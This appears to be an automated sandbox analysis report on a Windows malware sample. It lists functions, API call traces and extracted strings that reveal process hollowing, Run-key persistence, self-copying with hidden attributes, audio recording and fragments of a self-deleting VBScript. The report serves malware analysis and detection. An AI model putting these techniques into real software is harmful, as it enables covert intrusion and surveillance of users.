                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043E2FB Relevance: .2, Instructions: 237COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
                                • Instruction ID: 9176630f27626b4b14444871c43cfb7a364794bde640040d1d9abeeee83df0d0
                                • Opcode Fuzzy Hash: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
                                • Instruction Fuzzy Hash: E1614531602709E6EF349A2B48917BF2395AB1D304F58341BED42DB3C1D55DED428A1E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043E558 Relevance: .2, Instructions: 237COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
                                • Instruction ID: c8a25274eb6ace22fd939f207aba0bb726f52b15d0dfb3f1b2e2615f3a586ecc
                                • Opcode Fuzzy Hash: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
                                • Instruction Fuzzy Hash: B2619C71602609A6DA34496B8893BBF6394EB6D308F94341BE443DB3C1E61DEC43875E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043DE9D Relevance: .2, Instructions: 214COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                • Instruction ID: b97fed3bff06dc01e1c808345b9e1576e5435f58d5e0cb17a963d6e43aa39459
                                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                • Instruction Fuzzy Hash: C8516A21E01A4496DB38892964D67BF67A99B1E304F18390FE443CB7C2C64DED06C35E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00427BAF Relevance: .2, Instructions: 187COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                                • Instruction ID: 96b5c22f40dc969dc1399d427f9382315b517a9523814fa291cced01a0c32d8b
                                • Opcode Fuzzy Hash: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                                • Instruction Fuzzy Hash: 5B617E72A083059FC304DF35D581A5FB7E5AFCC318F510E2EF499D6151EA35EA088B86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00438770 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction ID: 78f0f7b5b7642c22d8ee35c169576c4e0068381375f86828a5140fd971b96714
                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction Fuzzy Hash: 9311E6BB24034143D6088A2DCCB85B7E797EADD321F7D626FF0424B758DB2AA9459608
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D420 Relevance: 49.3, APIs: 6, Strings: 22, Instructions: 282registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,Pj,004752F0,?,pth_unenc), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                • ExitProcess.KERNEL32 ref: 0040D7D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$wend$while fso.FileExists("
                                • API String ID: 1861856835-2780701618
                                • Opcode ID: 3636752152bf25bba4ed1af56f8eb063c4a7c092bf6ba356f7e6c0dd9e632a49
                                • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                • Opcode Fuzzy Hash: 3636752152bf25bba4ed1af56f8eb063c4a7c092bf6ba356f7e6c0dd9e632a49
                                • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                • ResumeThread.KERNEL32(?), ref: 00418435
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                • GetLastError.KERNEL32 ref: 0041847A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                • API String ID: 4188446516-3035715614
                                • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                • GetCurrentProcessId.KERNEL32 ref: 00412541
                                • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                • Sleep.KERNEL32(000001F4), ref: 00412682
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                • API String ID: 2649220323-436679193
                                • Opcode ID: 9ecf8f8d4c70b580fdd2dc0aff552b5be433a566aa934f8f3456794d39b6c919
                                • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                • Opcode Fuzzy Hash: 9ecf8f8d4c70b580fdd2dc0aff552b5be433a566aa934f8f3456794d39b6c919
                                • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                • SetEvent.KERNEL32 ref: 0041B219
                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                • CloseHandle.KERNEL32 ref: 0041B23A
                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                • API String ID: 738084811-2094122233
                                • Opcode ID: 9c1406b7fe5af7018f68ccb5b24fb03548191950d6e0523ed5e8582fc8778fdf
                                • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                • Opcode Fuzzy Hash: 9c1406b7fe5af7018f68ccb5b24fb03548191950d6e0523ed5e8582fc8778fdf
                                • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Write$Create
                                • String ID: RIFF$WAVE$data$fmt
                                • API String ID: 1602526932-4212202414
                                • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\xi0TpAxHGMsm.exe,00000001,0040764D,C:\Users\user\Desktop\xi0TpAxHGMsm.exe,00000003,00407675,Pj,004076CE), ref: 00407284
                                • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: C:\Users\user\Desktop\xi0TpAxHGMsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                • API String ID: 1646373207-948601862
                                • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044F42D Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 419COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$EnvironmentVariable$_wcschr
                                • String ID: H%j
                                • API String ID: 3899193279-3294387659
                                • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040CDF9 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 0040CE07
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\xi0TpAxHGMsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                • _wcslen.LIBCMT ref: 0040CEE6
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\xi0TpAxHGMsm.exe,00000000,00000000), ref: 0040CF84
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                • _wcslen.LIBCMT ref: 0040CFC6
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                • ExitProcess.KERNEL32 ref: 0040D062
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
